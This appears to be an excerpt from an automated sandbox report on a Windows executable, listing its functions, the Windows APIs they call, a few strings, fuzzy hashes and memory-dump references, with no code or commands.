Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction ID: 9163c63e9dcf2857a867b1a704547ba782784a195ce2dacd6332f5378cc0dd36
Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
Instruction Fuzzy Hash: 41F0AF22A086C285FB248F20E4413796670EB14B7EF484335D7FCC11D4CF28D8A6D300

Function 00007FF6CCCBD94C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF6CCCBD98A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction ID: a63e6fc71b43e45de4075103a3118f3cb2114fc9f05e3fc56bbf97f74fcb7096
Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
Instruction Fuzzy Hash: 04F08C10F092C745FF146EF258716B512B05F847A2F481AF0DFEEC62C9DE2CE4808210

Function 00007FF6CCC92490 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF6CCC924A2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction ID: 08980c09912d10769c77e200f8429cbbd196fabb64b18c7eab66545c29a2f078
Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
Instruction Fuzzy Hash: D9D01212D0949182DE109B35989103D2360AF9273AFA40730D7BED1AE1CE1D9496A311

Function 00007FF6CCC97FC4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF6CCC97FD2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction ID: c94d8988e071e1c9e1d89a16392a86596689acb529010619e9ac36051eb81dcf
Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
Instruction Fuzzy Hash: 2BC08C20F06542C1DF086F26C8C901813B4BB40B0AF604034C24DC1120CE2CC4FA9345

Non-executed Functions

Function 00007FF6CCC8C2F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 754fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC8DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CCC8CF4B), ref: 00007FF6CCC8DE27
Part of subcall function 00007FF6CCC8DE04: GetLastError.KERNEL32 ref: 00007FF6CCC8DE88
Part of subcall function 00007FF6CCC8DE04: CloseHandle.KERNEL32 ref: 00007FF6CCC8DE9B

wcscpy.LIBCMT ref: 00007FF6CCC8CBC8
wcscpy.LIBCMT ref: 00007FF6CCC8CBFE
CreateFileW.KERNEL32 ref: 00007FF6CCC8CC38
DeviceIoControl.KERNEL32 ref: 00007FF6CCC8CD01
CloseHandle.KERNEL32 ref: 00007FF6CCC8CD12
GetLastError.KERNEL32 ref: 00007FF6CCC8CD2E
RemoveDirectoryW.KERNEL32 ref: 00007FF6CCC8CD7D
DeleteFileW.KERNEL32 ref: 00007FF6CCC8CD88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CE89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CE8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CE9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEAD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CEC5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CECB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CED1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8CED7

Strings

UNC\, xrefs: 00007FF6CCC8C53F, 00007FF6CCC8C55D
\??\, xrefs: 00007FF6CCC8C392, 00007FF6CCC8C3B8
SeRestorePrivilege, xrefs: 00007FF6CCC8C343
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF6CCC8C34F

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseErrorFileHandleLastwcscpy$ControlCreateCurrentDeleteDeviceDirectoryProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 2659423929-3508440684
Opcode ID: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
Instruction ID: c25bcac643aaa3c72d0d5a6aca4a0fffb3a3641c929408b348354c3b66d2504f
Opcode Fuzzy Hash: 00964161ca9ce986acf484eb71c93c2db3db382fc2b8f17ad7e68b1fb415a3bc
Instruction Fuzzy Hash: 78629062F186C285FB009FB4D4546BE2371AB857A5F505232DBAD97AD9DF3CE185C300

Function 00007FF6CCC91A48 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF6CCC91A97
GetLongPathNameW.KERNEL32 ref: 00007FF6CCC91AE0
GetShortPathNameW.KERNEL32 ref: 00007FF6CCC91B21
GetShortPathNameW.KERNEL32 ref: 00007FF6CCC91B6A

Part of subcall function 00007FF6CCCA13C4: CompareStringW.KERNEL32 ref: 00007FF6CCCA13E3

MoveFileW.KERNEL32 ref: 00007FF6CCC91DFE
MoveFileW.KERNEL32 ref: 00007FF6CCC91E65

Part of subcall function 00007FF6CCC92134: CreateFileW.KERNEL32 ref: 00007FF6CCC9223C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91FE1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91FE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91FED

Strings

rtmp, xrefs: 00007FF6CCC91CF4, 00007FF6CCC91D03

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
String ID: rtmp
API String ID: 3587137053-870060881
Opcode ID: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
Instruction ID: ddfd7baba30de8e564612a769e0da51fb5078b284553359cd321926100ba2a02
Opcode Fuzzy Hash: 2d571345357ed831951e913cf5b34db2d9c750839b47aacb8777740eed476449
Instruction Fuzzy Hash: 9AF1BE22B08AC281EB10DF65D4851BE67B1EB857D9F501132EB8EC7AA9DF3CE585C740

Function 00007FF6CCC95B60 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32 ref: 00007FF6CCC95BC2
GetFullPathNameW.KERNEL32 ref: 00007FF6CCC95C0E
GetFullPathNameW.KERNEL32 ref: 00007FF6CCC95D2B
GetFullPathNameW.KERNEL32 ref: 00007FF6CCC95D70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC95EE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC95EE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC95EEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC95EF2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FullNamePath_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1693479884-0
Opcode ID: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
Instruction ID: 9fc700802b809cc6e73cf4ba53091691dafb7c4bcffd69a0f34c3e69b1c07351
Opcode Fuzzy Hash: b93ad2ce8aad967ae532d61f25a7d43417873e191935b00f4afba2dee12255a3
Instruction Fuzzy Hash: F2A1A262F18A9284FE008FB9D8445BD2371AB49BE9B545336DFAD97BD9DE3CE4418200

Function 00007FF6CCCB3170 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6CCCB318C
RtlCaptureContext.KERNEL32 ref: 00007FF6CCCB31B9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CCCB31D3
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CCCB3214
IsDebuggerPresent.KERNEL32 ref: 00007FF6CCCB3268
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CCCB3289
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CCCB3294

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction ID: a6e7c1a539e668346bdb09f93af2d3c169a2d0b2bd8c7adf03073c2654105103
Opcode Fuzzy Hash: eb4060bcbbf6947450414bc0ac192b8da1feec02df413969c5a674799d26ef14
Instruction Fuzzy Hash: 90310C72609BC18AEB609FA4E8903EA7374FB84745F48443ADB9D87A99DF3CD548C710

Function 00007FF6CCCB76D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6CCCB7751
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6CCCB7769
RtlVirtualUnwind.KERNEL32 ref: 00007FF6CCCB77A4
IsDebuggerPresent.KERNEL32 ref: 00007FF6CCCB77DD
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6CCCB77E7
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6CCCB77F2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction ID: d4a25a322d04a6741b25e0064f903e2e7899cc6e9de423f6357aeb26425f0a6b
Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
Instruction Fuzzy Hash: 1B314932608B8186EB609F65E8902AA73B4FB88B55F540136EF9D83B99DF3CD555CB00

Function 00007FF6CCC81AA4 Relevance: 6.3, APIs: 4, Instructions: 285COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81EA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81EAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81EB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81EBB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: f150905576e1962152a6538581ed401fb107eac56a89863026226d037d82469d
Instruction ID: 2e34e0fefc499830d2f0451e7d32a9f36b929d54dde4697822b0dac16600f626
Opcode Fuzzy Hash: f150905576e1962152a6538581ed401fb107eac56a89863026226d037d82469d
Instruction Fuzzy Hash: 38B1CE62A14AC686EB109F65D8446EE23B1FF86799F405236EB9CC7B99DF3CE540C300

Function 00007FF6CCCBFA94 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCBFAC4

Part of subcall function 00007FF6CCCB7934: GetCurrentProcess.KERNEL32(00007FF6CCCC0CCD), ref: 00007FF6CCCB7961

Strings

., xrefs: 00007FF6CCCBFEE4
*?, xrefs: 00007FF6CCCBFAEB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction ID: afca3b3355e37b346262268a1a1cbbe976ef48a1bae4db76f30fafe366acc730
Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
Instruction Fuzzy Hash: 5851D06AF14AD581EB10DFE698200B967B4FB58BD9B444532DF9D97B89EE3CE0428300

Function 00007FF6CCC8B6D8 Relevance: 4.5, APIs: 3, Instructions: 36windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF6CCC8BA9D), ref: 00007FF6CCC8B6E5
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,00007FF6CCC8BA9D), ref: 00007FF6CCC8B719
LocalFree.KERNEL32(?,?,?,?,?,?,?,00007FF6CCC8BA9D), ref: 00007FF6CCC8B743

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction ID: 507db97589d8357f103241af26bed9aca594d60886685d6ece13327f30446c20
Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
Instruction Fuzzy Hash: 4001EC71608B8282EB109F62B89057BA3A5BB99BC2F485035EBCE86B45CF3CD5158700

Function 00007FF6CCCBFCA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

., xrefs: 00007FF6CCCBFEE4

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction ID: d29275f5d7420b527d0b16a20d045134195a26a2f87a3cbc1a7d6870f1b3c2de
Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
Instruction Fuzzy Hash: A0312B26B086D145FB609F76A8157BA6AA1BB94BE5F048335EFAC87BC5CE3CD5018300

Function 00007FF6CCCAA2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 00007FF6CCCAA315
GetNumberFormatW.KERNEL32 ref: 00007FF6CCCAA371

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction ID: f0232d2556bb5445ba38dff96b8c4940e82173349d1a1b8df1cefee7cd3ebe8c
Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
Instruction Fuzzy Hash: F6111722A18BC195E6619F21E8507EA7370FF88B86F844175DB8D83668DF3CE255C744

Function 00007FF6CCC94EB0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00007FF6CCC94EE2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
Instruction ID: 97fd19870564cc72273d6284b51c1cf7414fc60fb0e24be45ee43906bda26220
Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
Instruction Fuzzy Hash: 69014F7194D5C3C9FB72DF20A4163BA67B1AFAA30BF440134D7DE86A91CE3CA0498A54

Function 00007FF6CCCC0D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6CCCC0D24

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction ID: 571482d9480e2fa2d0dd1d689ee4a0188cac2495ef5bbc7df51716b0028498b8
Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
Instruction Fuzzy Hash: BFB09220E17E82C2EA082F126C8229422B4BF48702F989038C38C81320DE3C20AA4700

Function 00007FF6CCC9DC70 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
